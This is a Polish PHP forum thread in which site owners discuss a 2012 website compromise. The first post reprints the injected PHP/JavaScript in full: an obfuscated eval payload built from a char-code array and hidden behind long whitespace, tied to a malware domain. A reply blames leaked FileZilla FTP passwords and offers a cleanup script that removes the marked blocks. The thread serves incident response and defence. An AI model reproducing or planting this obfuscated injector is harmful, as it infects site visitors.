Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> [PHP] Atak hakerski: v=\"va\"+\"l\";try{faweb++}catch(btawetb){try{fve^32}catch(btawt4){w=window;e=
tomekpl
post
Post #1





Grupa: Zarejestrowani
Postów: 134
Pomógł: 5
Dołączył: 9.08.2008
Skąd: Szczecin

Ostrzeżenie: (0%)
-----

Witam,
Wchodzę dzisiaj na jedną z moich stron i widzę ostrzeżenie o złośliwym opragromowaniu:

Cytat
Witryna ubezpieczenia-szczecin.com zawiera treści z witryny trafficslotsfive.info, która jest znana jako źródło złośliwego oprogramowania. ...


Do głównego pliku indeks jest dodany kod:
Kod
#0247a1#
                                                                                                                                                                                                                                                                                                                                                              if(!$srvc_counter) {
echo "                                                                                                                                                                                                                                                                                                                                                              <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                                                                                                                              v=\"va\"+\"l\";try{faweb++}catch(btawetb){try{fve^32}catch(btawt4){w=window;e=w[\"e\".concat(v)];}}if(1){f=new Array(40,101,115,110,98,114,105,110,108,40,40,11,10,122,11,10,31,116,97,113,30,97,
31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99
,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,97,45,113,114,98,30,6
1,31,37,104,115,114,112,57,45,47,83,80,65,69,68,73,66,81,76,78,82,83,69,71,86,68,
44,105,109,100,111,46,98,101,113,103,118,104,108,103,46,99,108,100,97,116,100,98,
45,104,108,99,113,99,97,114,99,115,94,113,117,97,107,105,115,114,105,109,101,95,1
15,109,46,111,102,112,38,57,13,9,30,97,45,113,116,120,106,101,45,110,111,114,103,
116,104,109,110,31,59,32,38,95,98,114,109,108,116,114,101,38,57,13,9,30,97,45,113
,116,120,106,101,45,96,111,113,98,101,113,30,61,31,37,48,38,57,13,9,30,97,45,113,
116,120,106,101,45,102,101,104,101,104,115,30,61,31,37,49,111,118,39,58,11,10,31,
95,46,114,114,121,107,99,46,118,103,100,115,102,32,60,30,39,48,110,120,38,57,13,9
,30,97,45,113,116,120,106,101,45,106,101,101,114,32,60,30,39,48,110,120,38,57,13,
9,30,97,45,113,116,120,106,101,45,114,111,111,30,61,31,37,49,111,118,39,58,11,10,
12,8,32,104,100,40,32,98,111,98,115,109,100,108,116,45,101,101,115,67,108,100,107
,101,109,114,66,120,71,100,39,37,97,99,110,108,38,39,41,12,8,32,122,11,10,31,98,1
11,98,115,109,100,108,116,45,117,114,104,114,101,39,37,60,99,103,118,31,103,100,6
0,90,39,96,98,112,107,90,39,61,58,47,99,103,118,61,37,41,58,11,10,31,98,111,98,11
5,109,100,108,116,45,101,101,115,67,108,100,107,101,109,114,66,120,71,100,39,37,9
7,99,110,108,38,39,46,96,110,112,100,108,100,66,102,105,107,98,40,96,39,59,12,8,3
2,124,11,10,124,39,40,40,57);}w=f;s=[];r=String;x=\"j%\";for(i=0;-i+453!=0;i+=1){j=i;if(e&&(031==0x19))s=s+r[\"fromCharCode\"]((1*w[j]+e(x+3)));}if(0x10==020)try{(w+s)()}catch(asga){e(\"if(1)\"+s+\"\");}</script>";
$srvc_counter = true;
}

#/0247a1#


Sprawdziłem inne strony na innych serwerach i też są zhackowane. Z czego może to wynikać? Może być, że poprzez zewnętrzne pliku js? korzystam z apps google na wielu stronach itp
Go to the top of the page
+Quote Post
 
 Start new topic
Odpowiedzi
mike87
post
Post #2





Grupa: Zarejestrowani
Postów: 1
Pomógł: 0
Dołączył: 18.10.2012

Ostrzeżenie: (0%)
-----

Cześć!

1. Wyczyścić hasła z historii FileZilli - na 100% stamtąd wyciekły hasła - są zapisywane plainem.
2. Zmienić hasła FTP, zasyfione będą wszystkie serwery, które były na liście zapisanych serwerów i historii ostatnich.
3. Usunąć u siebie wirusa na kompie (u mnie się tak zaszył, że pozostał format).
4. Wrzucić plik, z kodem poniżej, ustawić ścieżkę na zmiennej $rpath.
5. Odplaić skrypt (nie biorę odpowiedzialności za ewentualne straty).
6. Czasem generuje warningi - nie wiem jeszcze czemu - skrypt pisałem na prędkości.
7. Postawić mi piwo. Pozdrawiam!

[PHP] pobierz, plaintext 
  1. <?php
  2.  
  3.   // sciezka do czyszczenia 
  4.   $rpath='/home/user/domains/'; 
  5.  
  6.  
  7.  
  8.   function ListFiles($dir) {
  9.  
  10.       if($dh = opendir($dir)) {
  11.  
  12.           $files = Array();
  13.           $inner_files = Array();
  14.  
  15.           while($file = readdir($dh)) {
  16.               if($file != "." && $file != ".." && $file[0] != '.') {
  17.                   if(is_dir($dir . "/" . $file)) {
  18.                       $inner_files = ListFiles($dir . "/" . $file);
  19.                       if(is_array($inner_files)) $files = array_merge($files, $inner_files); 
  20.                   } else {
  21.                       array_push($files, $dir . "/" . $file);
  22.                   }
  23.               }
  24.           }
  25.  
  26.           closedir($dh);
  27.           return $files;
  28.       }
  29.   }
  30.  
  31.  
  32.  
  33.  
  34.  
  35.  
  36.   $patS[1]='<?'.chr(10).'#0247a1#';
  37.   $patE[1]='#/0247a1#'.chr(10).'?'.'>';
  38.  
  39.   $patS[2]='<?php'.chr(10).'if (!isset($sRetry))';
  40.   $patE[2]='curl_close($stCurlHandle); '.chr(10).'}'.chr(10).'}'.chr(10).'?'.'>'; 
  41.  
  42.   $patS[1]='/*0247a1*/';
  43.   $patE[1]='/*/0247a1*/';  
  44.  
  45.   foreach (ListFiles($rpath) as $key=>$file){
  46.      $ext=pathinfo($file, PATHINFO_EXTENSION);
  47.  
  48.  
  49.  
  50.      if($ext=='php' || $ext=='tpl' || $ext=='js') {
  51.  
  52.           $src=file_get_contents($file);
  53.           $tmp=$src;
  54.           $usu=0;
  55.  
  56.           for($i=1; $i<=count($patE); $i++) {
  57.             $posS = strpos($src, $patS[$i]);
  58.             $posE = strpos($src, $patE[$i]);  
  59.  
  60.  
  61.  
  62.             if($posS && $posE) {
  63.               $src=substr($src,0,$posS).substr($src,$posE+strlen($patE[$i]),strlen($src));
  64.               $usu++;
  65.             }
  66.  
  67.           }
  68.  
  69.           if($usu>0) {
  70.             echo '!!!! Usunięto '.$usu.' ciągów !!!<br/>';
  71.             file_put_contents($file.'__antyvir', $tmp);
  72.             file_put_contents($file.'', $src);            
  73.  
  74.           } else {
  75.             echo '<br/>';
  76.           }
  77.  
  78.      }
  79.   }  
  80.  
  81.  
  82.  
  83. ?>
[PHP] pobierz, plaintext


Ten post edytował mike87 18.10.2012, 10:29:55
Go to the top of the page
+Quote Post

Posty w temacie
- tomekpl   [PHP] Atak hakerski: v=\"va\"+\"l\";try{faweb++}catch(btawetb){try{fve^32}catch(btawt4){w=window;e=   17.10.2012, 11:38:20
- - Mega_88   Dokładnie dziś o 02:47 nastąpiło włamanie. Mam dok...   17.10.2012, 11:57:42
- - tomekpl   Servery mam w różnych lokalizacjach jeden w home.p...   17.10.2012, 12:04:09
- - Mega_88   Kod jest prawie we wszystkich plikach. Właśnie prz...   17.10.2012, 12:09:08
- - Spriggan   Ten sam problem i u mnie . Na moim serwerze coś do...   17.10.2012, 12:31:30
- - Mega_88   Myślałem, że problemem jest TinyMce z którego korz...   17.10.2012, 12:38:43
- - !*!   Było już wielokrotnie na forum. Poszukaj pod ...   17.10.2012, 12:46:40
|- - Mega_88   Cytat(!*! @ 17.10.2012, 13:46...   17.10.2012, 13:03:37
|- - bostaf   Cytat(Mega_88 @ 17.10.2012, 14:03:37 ...   17.10.2012, 14:10:24
- - !*!   http://forum.php.pl/index.php?showtopic=187417   17.10.2012, 13:10:30
- - tomekpl   Na 100% jest to wirus na komputerze ofiary. Łączy ...   17.10.2012, 14:15:07
- - Lesiuk7   Skrypt w ruby do usuwania tego syfu z kodu strony....   17.10.2012, 15:52:48
- - mike87   Cześć! 1. Wyczyścić hasła z historii FileZill...   18.10.2012, 10:26:56
- - Spriggan   Wypada tylko podziękować wszystkim tu za pomoc. Ni...   18.10.2012, 12:22:08
- - redeemer   Nie zabezpieczysz się przed takimi atakami zmianą ...   18.10.2012, 12:52:05
- - szczemp   Ja miałem parę lat temu podobne coś na nazwa.pl. W...   18.10.2012, 17:21:33

« Następny starszy · Przedszkole · Następny nowszy »
 

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 21.03.2026 - 18:30
Powered By IP.Board © 2026  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn